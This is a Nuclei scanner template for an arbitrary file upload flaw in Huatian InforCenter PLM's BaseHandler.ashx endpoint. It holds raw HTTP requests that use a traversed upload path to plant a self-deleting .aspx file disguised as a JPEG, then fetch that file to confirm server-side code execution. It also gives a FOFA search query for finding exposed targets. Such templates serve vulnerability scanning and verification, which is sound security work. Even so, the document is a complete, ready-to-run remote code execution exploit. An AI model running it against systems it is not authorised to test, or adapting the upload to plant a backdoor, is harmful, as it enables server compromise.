http:
    - extractors:
        - group: 1
          internal: true
          name: upload_path
          part: body_1
          regex:
            - '"(?:\.\.)?(/Files/\d{8}/[a-f0-9-]+\.aspx)"'
          type: regex
      matchers:
        - dsl:
            - status_code==200 && contains_all(body,"pboyjnnrfipmplsukdeczudsefxmywe")
          name: 任意文件上传
          type: dsl
      raw:
        - |
          POST /Base/BaseHandler.ashx?type=uploadFileToIIS&uploadPath=../Files/ HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTxlvAiDA82bSOF0h
          Accept-Encoding: gzip, deflate

          ------WebKitFormBoundaryTxlvAiDA82bSOF0h
          Content-Disposition: form-data; name="file"; filename="{{username}}.aspx"
          Content-Type: image/jpeg

          <%@Page Language="C#"%><%Response.Write("pboyjnnrfipmplsukdeczudsefxmywe");System.IO.File.Delete(Request.PhysicalPath);%>
          ------WebKitFormBoundaryTxlvAiDA82bSOF0h--
        - |
          GET {{upload_path}} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Connection: close
id: HuanTianRuanJian-InforCenter-PLM-BaseHandler_ashx-File-upload
info:
    author: HuanXiong
    description: |-
        fofa: body="/Base/BaseHandler.ashx"
        华天软件InforCenter PLM BaseHandler.ashx 接口存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 华天软件InforCenter PLM BaseHandler.ashx 任意文件上传
    reference:
        - null
    severity: critical
    tags: []
variables:
    username: '{{to_lower(rand_base(6))}}'
